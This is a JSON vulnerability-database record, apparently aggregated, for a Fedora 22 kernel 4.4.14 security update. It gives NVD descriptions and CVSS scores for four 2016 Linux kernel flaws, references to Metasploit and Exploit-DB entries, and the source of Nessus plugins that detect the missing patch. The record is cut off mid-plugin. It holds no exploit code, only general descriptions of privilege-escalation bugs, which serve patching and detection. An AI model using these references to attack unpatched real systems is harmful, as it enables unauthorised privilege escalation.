{"id": "FEDORA:EE2EE6087A58", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 22 Update: kernel-4.4.14-200.fc22", "description": "The kernel meta package ", "published": "2016-07-19T07:20:52", "modified": "2016-07-19T07:20:52", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4997", "CVE-2016-4998"], "lastseen": "2020-12-21T08:17:53", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998", "CVE-2016-1583"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-4470"]}, {"type": "nessus", "idList": ["FEDORA_2016-63EE0999E4.NASL", "FEDORA_2016-1C409313F4.NASL", "SUSE_SU-2016-1710-1.NASL", "SUSE_SU-2016-1709-1.NASL", "ORACLEVM_OVMSA-2016-0133.NASL", "FEDORA_2016-73A733F4D9.NASL", "SL_20160915_KERNEL_ON_SL7_X.NASL", "ORACLELINUX_ELSA-2016-3619.NASL", "ORACLEVM_OVMSA-2016-0134.NASL", "ORACLELINUX_ELSA-2016-3618.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310871661", "OPENVAS:1361412562310808556", "OPENVAS:1361412562310851367", "OPENVAS:1361412562310808914", "OPENVAS:1361412562310882558", "OPENVAS:1361412562310851342", "OPENVAS:1361412562310808522", "OPENVAS:1361412562311220161048", "OPENVAS:1361412562310120707", "OPENVAS:1361412562310851360"]}, {"type": "f5", "idList": ["SOL55672042", "F5:K55672042", "F5:K10515241", "F5:K74171196"]}, {"type": "fedora", "idList": ["FEDORA:F325C6013F0A", "FEDORA:4F34C605E513"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC_IPV4", "MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-3619", "ELSA-2016-3636", "ELSA-2016-1847", "ELSA-2016-3591", "ELSA-2016-3617", "ELSA-2016-3618", "ELSA-2016-3635", "ELSA-2016-3592"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2018-1", "SUSE-SU-2016:1998-1", "SUSE-SU-2016:1596-1", "SUSE-SU-2016:1710-1", "OPENSUSE-SU-2016:1798-1", "SUSE-SU-2016:1999-1", "SUSE-SU-2016:2000-1", "SUSE-SU-2016:1709-1"]}, {"type": "redhat", "idList": ["RHSA-2016:2074", "RHSA-2017:2760", "RHSA-2016:2076", "RHSA-2016:1847", "RHSA-2016:1883", "RHSA-2016:1875"]}, {"type": "amazon", "idList": ["ALAS-2016-718"]}, {"type": "centos", "idList": ["CESA-2016:1847"]}, {"type": "zdt", "idList": ["1337DAY-ID-25603", "1337DAY-ID-26412", "1337DAY-ID-24860"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139880", "PACKETSTORM:138854"]}, {"type": "exploitdb", "idList": ["EDB-ID:40435", "EDB-ID:39992", "EDB-ID:40489"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9D752285F4A2795E32FB57E31FD31AB0"]}, {"type": "ubuntu", "idList": ["USN-3008-1", "USN-2999-1"]}], "modified": "2020-12-21T08:17:53", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-12-21T08:17:53", "rev": 2}, "vulnersScore": 7.0}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "22", "arch": "any", "packageName": "kernel", "packageVersion": "4.4.14", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"cve": [{"lastseen": "2021-02-02T06:28:08", "description": "The IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2016-07-03T21:59:00", "title": "CVE-2016-4998", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4998"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:linux:linux_kernel:4.5.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:oracle:linux:7", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-4998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4998", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-03T21:59:00", "title": "CVE-2016-4997", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4997"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:oracle:linux:7", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-4997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4997", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:07", "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-4470", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4470"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_for_real_time:7.0", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:oracle:linux:5.0", "cpe:/o:linux:linux_kernel:4.6.3", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-4470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:03", "description": "The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel before 4.6.3 allows local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-1583", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1583"], "modified": "2018-12-06T22:29:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-1583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1583", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2016-4470", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-4470.html", "title": "CVE-2016-4470", "type": "android", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:14:19", "description": "The 4.4.14 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-20T00:00:00", "title": "Fedora 22 : kernel (2016-63ee0999e4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-63EE0999E4.NASL", "href": "https://www.tenable.com/plugins/nessus/92442", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-63ee0999e4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92442);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_xref(name:\"FEDORA\", value:\"2016-63ee0999e4\");\n\n script_name(english:\"Fedora 22 : kernel (2016-63ee0999e4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.4.14 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-63ee0999e4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-63ee0999e4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"kernel-4.4.14-200.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:02", "description": "Rebase to latest upstream 4.6 release, 4.6.3.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-15T00:00:00", "title": "Fedora 24 : kernel (2016-1c409313f4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-1C409313F4.NASL", "href": "https://www.tenable.com/plugins/nessus/92232", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-1c409313f4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92232);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\", \"CVE-2016-5728\");\n script_xref(name:\"FEDORA\", value:\"2016-1c409313f4\");\n\n script_name(english:\"Fedora 24 : kernel (2016-1c409313f4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to latest upstream 4.6 release, 4.6.3.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-1c409313f4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif 